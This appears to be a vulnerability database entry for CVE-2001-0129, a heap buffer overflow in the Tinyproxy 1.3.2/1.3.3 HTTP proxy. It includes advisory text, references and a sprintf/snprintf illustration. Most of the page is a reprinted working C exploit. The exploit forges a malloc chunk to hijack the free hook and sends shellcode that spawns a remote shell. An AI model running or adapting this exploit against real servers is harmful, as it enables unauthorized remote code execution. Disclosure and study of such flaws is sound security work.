CVE-2001-0129
CVSS 10.0
Published: 2001-03-12 00:00:00
Revised: 2016-10-17 22:09:47

[Original] Buffer overflow in Tinyproxy HTTP proxy 1.3.3 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long connect request.


[CNNVD] Tinyproxy HTTP Proxy Buffer Overflow Vulnerability (CNNVD-200103-036)

Tinyproxy HTTP proxy 1.3.3 and earlier versions contain a buffer overflow vulnerability. A remote attacker can use an over-long connect request to cause a denial of service and possibly execute arbitrary commands.

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)

cpe:/a:tinyproxy:tinyproxy:1.3.3
cpe:/a:tinyproxy:tinyproxy:1.3.2

- OVAL (Technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0129
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0129
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-036
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=97975486527750&w=2
(UNKNOWN)  BUGTRAQ  20010117 [pkc] remote heap overflow in tinyproxy
http://www.debian.org/security/2001/dsa-018
(PATCH)  DEBIAN  DSA-018
http://www.securityfocus.com/bid/2217
(VENDOR_ADVISORY)  BID  2217
http://xforce.iss.net/static/5954.php
(UNKNOWN)  XF  tinyproxy-remote-bo(5954)

- Vulnerability information

Tinyproxy HTTP Proxy Buffer Overflow Vulnerability
Critical  Buffer overflow
2001-03-12 00:00:00 2005-05-02 00:00:00
Remote
Tinyproxy HTTP proxy 1.3.3 and earlier versions contain a buffer overflow vulnerability. A remote attacker can use an over-long connect request to cause a denial of service and possibly execute arbitrary commands.

- Advisories and patches


- Vulnerability information (20559)

tinyproxy tinyproxy 1.3.2/1.3.3 Heap Overflow Vulnerability (EDBID:20559)
windows remote
2001-01-17 Verified
0 CyRaX
N/A
source: http://www.securityfocus.com/bid/2217/info

Versions 1.3.2 and 1.3.3 of tinyproxy, a small HTTP proxy, exhibit a vulnerability to heap overflow attacks.

A failure to properly validate user-supplied input that is passed as an argument to a call to sprintf() can allow an unexpectedly large amount of input to be written to a heap buffer (used to display error messages), past the boundary of the allocated space.

As a result, it may be possible to carry out a denial of service attack, or even to execute arbitrary commands if certain internal memory structures can be successfully overwritten.
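As an added illustration (not Tinyproxy's code and not part of the original record), the unbounded sprintf() pattern the advisory describes is shown beside a bounded replacement that detects truncation; ERRMSG_LEN, the message text and the constructed over-long request are assumptions.

```c
/* Added example, not Tinyproxy's code: a heap error-message buffer filled with
 * sprintf() from a client-controlled request line (the bug class behind
 * CVE-2001-0129). ERRMSG_LEN, the message text and the request are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ERRMSG_LEN 256   /* assumed size of the heap-allocated error buffer */

/* Vulnerable pattern: sprintf() has no bound, so a request longer than the
 * allocation is written past the end of the malloc()ed block (heap overflow).
 * Kept only for comparison; the demo below never calls it. */
char *build_error_unsafe(const char *request)
{
    char *msg = malloc(ERRMSG_LEN);
    if (!msg) return NULL;
    sprintf(msg, "Unable to parse request: %s", request);
    return msg;
}

/* Hardened pattern: snprintf() is bounded by the allocation and its return
 * value is checked, so an over-long request is reported as truncated instead
 * of overflowing. Returns NULL only on allocation failure. */
char *build_error_safe(const char *request, int *truncated)
{
    char *msg = malloc(ERRMSG_LEN);
    if (!msg) return NULL;
    int n = snprintf(msg, ERRMSG_LEN, "Unable to parse request: %s", request);
    *truncated = (n < 0 || (size_t)n >= ERRMSG_LEN);
    return msg;
}

/* Demo driver: a constructed 1023-byte "connect" line, far longer than the
 * buffer, like the request the advisory describes. Returns the message length. */
size_t demo_oversized_request(int *truncated)
{
    char req[1024];
    memset(req, 'A', sizeof req - 1);
    req[sizeof req - 1] = '\0';
    memcpy(req, "connect ", 8);
    char *msg = build_error_safe(req, truncated);
    size_t len = msg ? strlen(msg) : 0;
    free(msg);
    return len;
}

int main(void)
{
    int trunc = 0;
    size_t len = demo_oversized_request(&trunc);
    printf("message length %zu, truncated=%d\n", len, trunc);
    return 0;
}
```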

/*
 * Exploit for tinyproxy 1.3.2 and 1.3.3
 * by |CyRaX| <cyrax@pkcrew.org>
 * Packet Knights Crew - www.pkcrew.org
 * READ THE ADVISORY FIRST !
 * Greetz :
 *  bikappa: for some help
 *  all the pkc members expecially recidjvo, asynchro and cthulhu
 *  all the other friends
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* two-byte short jump, repeated to form a jump sled */
char jmps[]="\xeb\x0e";

char c0de[]="\xeb\x0e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90"
            "\x89\xe5"
            "\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
            "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
            "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
            "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
            "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
            "\x80\xea\x27\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x1f\x5e"
            "\x80\x46\x04\x01"
            "\x80\x06\x01"
            "\x89\x75"
            "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
            "\x8d\x55\x0c\xcd\x80\xe8\xdc\xff\xff\xff\x2e\x62\x69\x6e\x2e\x73\x68";

void usage();

void usage(){
   printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| <cyrax@pkcrew.org>\n");
   printf("Packet Knights Crew - http://www.pkcrew.org\n");
   printf("please.. READ the advisory first!\n");
   printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset> <free_hook> <shellcode>\n");
   printf("buf_size is the size of the buf we send\n");
   printf("struct offset is the distance from the beginning of the buffer we send where we\n");
   printf("       we put the malloc chunk struct!\n");
   printf("free_hook is the address of the free_hook function pointer\n");
   printf("shellcode is the address of the shellcode (you don't neet to hit it correctly\n");
   printf("          you can just hope to it a jump\n");
   printf("\nfree_hook and shellcode must be given in 0xaddress format\n");
   exit(0);
}

int main(int argc, char **argv){
   int s,i,err,pid[5];
   struct sockaddr_in dst;
   /* fake malloc chunk header that is written into the overflowing buffer */
   struct malloc_chunk{
      unsigned int ps;            /* prev_size */
      unsigned int sz;            /* size */
      struct malloc_chunk *fd;
      struct malloc_chunk *bk;
   }mc;
   char *magic,*sndbuff;
   unsigned long FREE_HOOKZ,SHELLCODE;
   /* all six arguments (argv[1]..argv[6]) are read below */
   if(argc<7)usage();
   magic=(char *)malloc(atoi(argv[3])+1);
   sndbuff=(char *)malloc(atoi(argv[3])+30);
   memset(magic,'\x90',atoi(argv[3]));   /* NOP fill */

   SHELLCODE=strtol(argv[6],NULL,16);
   FREE_HOOKZ=strtol(argv[5],NULL,16);

   dst.sin_addr.s_addr=inet_addr(argv[1]);
   dst.sin_port=htons(atoi(argv[2]));
   dst.sin_family=AF_INET;
   /* fd/bk of the fake chunk are the two addresses given on the command line */
   mc.ps=0xffffffff & ~1;
   mc.sz=0xffffffff;
   mc.fd=(struct malloc_chunk *)(SHELLCODE);
   mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);

   s=socket(AF_INET,SOCK_STREAM,0);
   if(s<0 || connect(s,(struct sockaddr *)&dst,sizeof(dst))<0){
      perror("connect");
      exit(1);
   }
   /* place the fake chunk at the offset supplied as <struct offset> */
   memcpy(magic+atoi(argv[4]),&mc,sizeof(mc));

   if((atoi(argv[3])/2)<atoi(argv[4])){
      /* putting jmps and shellcode before the struct */
      for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){
         memcpy(magic+i,jmps,2);
      }
   }
   else {
      /* putting jmps and shellcode after the struct */
      for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){
         memcpy(magic+i,jmps,2);
      }
   }
   memcpy(magic+i,c0de,strlen(c0de));

   magic[atoi(argv[3])]=0;

   printf("strlen magic is %i\n",(int)strlen(magic));
   /* wrap the buffer in an oversized "connect" request line */
   sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://\n",magic)]=0;
   printf("shooting\n");
   err=send(s,sndbuff,strlen(sndbuff),0);
   close(s);
   return 0;
}


- Vulnerability information

493
tinyProxy Connect Request Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

This host is running the 'tinyProxy' server. This proxy server is vulnerable to a heap overflow attack. By issuing a malformed request, an attacker can cause a denial of service or possibly execute code on this host. An attacker can use this to disable the proxy server and deny legitimate users access.

- Timeline

2001-01-17 Unknown
2001-01-17 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- References

- Credit

Unknown or Incomplete